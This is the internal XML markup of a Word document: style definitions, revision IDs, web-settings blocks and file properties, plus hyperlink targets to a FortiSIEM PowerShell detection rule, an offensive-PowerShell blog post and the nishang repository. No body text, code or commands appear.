    <w:rsid w:val="007C6D79"/>
    <w:rsid w:val="007C7ADD"/>
    <w:rsid w:val="007D1127"/>
    <w:rsid w:val="007D722D"/>
    <w:rsid w:val="007E46C7"/>
    <w:rsid w:val="007F2AF7"/>
    <w:rsid w:val="008323AF"/>
    <w:rsid w:val="0086058B"/>
    <w:rsid w:val="008E015B"/>
    <w:rsid w:val="008E5916"/>
    <w:rsid w:val="008F5563"/>
    <w:rsid w:val="00920B9F"/>
    <w:rsid w:val="00950170"/>
    <w:rsid w:val="009513B1"/>
    <w:rsid w:val="00963582"/>
    <w:rsid w:val="009A609A"/>
    <w:rsid w:val="009B29DF"/>
    <w:rsid w:val="009B3D6C"/>
    <w:rsid w:val="009C77EC"/>
    <w:rsid w:val="009E661C"/>
    <w:rsid w:val="00A04255"/>
    <w:rsid w:val="00A26590"/>
    <w:rsid w:val="00A71933"/>
    <w:rsid w:val="00A915AD"/>
    <w:rsid w:val="00AE2D4F"/>
    <w:rsid w:val="00AE7D4C"/>
    <w:rsid w:val="00AE7DCC"/>
    <w:rsid w:val="00BD4776"/>
    <w:rsid w:val="00BD5EB2"/>
    <w:rsid w:val="00C33534"/>
    <w:rsid w:val="00C346A2"/>
    <w:rsid w:val="00C43843"/>
    <w:rsid w:val="00C47920"/>
    <w:rsid w:val="00C9674C"/>
    <w:rsid w:val="00CD299B"/>
    <w:rsid w:val="00D02EFA"/>
    <w:rsid w:val="00D13661"/>
    <w:rsid w:val="00D361EF"/>
    <w:rsid w:val="00D74687"/>
    <w:rsid w:val="00DB06D3"/>
    <w:rsid w:val="00DC5754"/>
    <w:rsid w:val="00E04747"/>
    <w:rsid w:val="00E215F9"/>
    <w:rsid w:val="00E31603"/>
    <w:rsid w:val="00EA3FBD"/>
    <w:rsid w:val="00EA4DFA"/>
    <w:rsid w:val="00EB43EF"/>
    <w:rsid w:val="00EF2094"/>
    <w:rsid w:val="00F017D9"/>
    <w:rsid w:val="00F14371"/>
    <w:rsid w:val="00F52B71"/>
    <w:rsid w:val="00F63A2C"/>
    <w:rsid w:val="00F77DE8"/>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719C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5665DE95-B50C-4976-BCA5-D35EE090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391"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Segoe UI"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00394391"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="120"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="28"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00394391"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:color w:val="0070C0"/>
      <w:kern w:val="2"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="26"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00394391"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:color w:val="00B0F0"/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="24"/>
      <w14:ligatures w14:val="standardContextual"/>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C967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7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7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7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7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91"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:sz w:val="40"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00394391"/>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394391"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:color w:val="00B0F0"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00394391"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="8" w:space="4" w:color="4472C4" w:themeColor="accent1"/>
      </w:pBdr>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="323E4F" w:themeColor="text2" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
      <w:kern w:val="2"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00394391"/>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C9674C"/>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C9674C"/>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C9674C"/>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C9674C"/>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C9674C"/>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C967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74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967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74C"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Segoe UI"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C9674C"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00C9674C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00C96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74C"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Segoe UI"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00C9674C"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE2D4F"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE2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0784">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="35355990">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="107773249">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="662313683">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="696394551">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="722364701">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="793325581">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1420055579">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1501040481">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1657757578">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1704554210">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1909723410">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1978145583">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="210449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lp.fortinet.com/fsiem/Public_Resource_Access/7_1_3/rules/PH_RULE_Suspicious_PowerShell_Parent_Proces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njitrapp.github.io/attacks/2024-01-04-offensive-powershell/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/samratashok/nisha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6773</Words>
  <Characters>38609</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>321</Lines>
  <Paragraphs>90</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>45292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pol</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>sandeep j0352</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-29T14:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-25T09:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>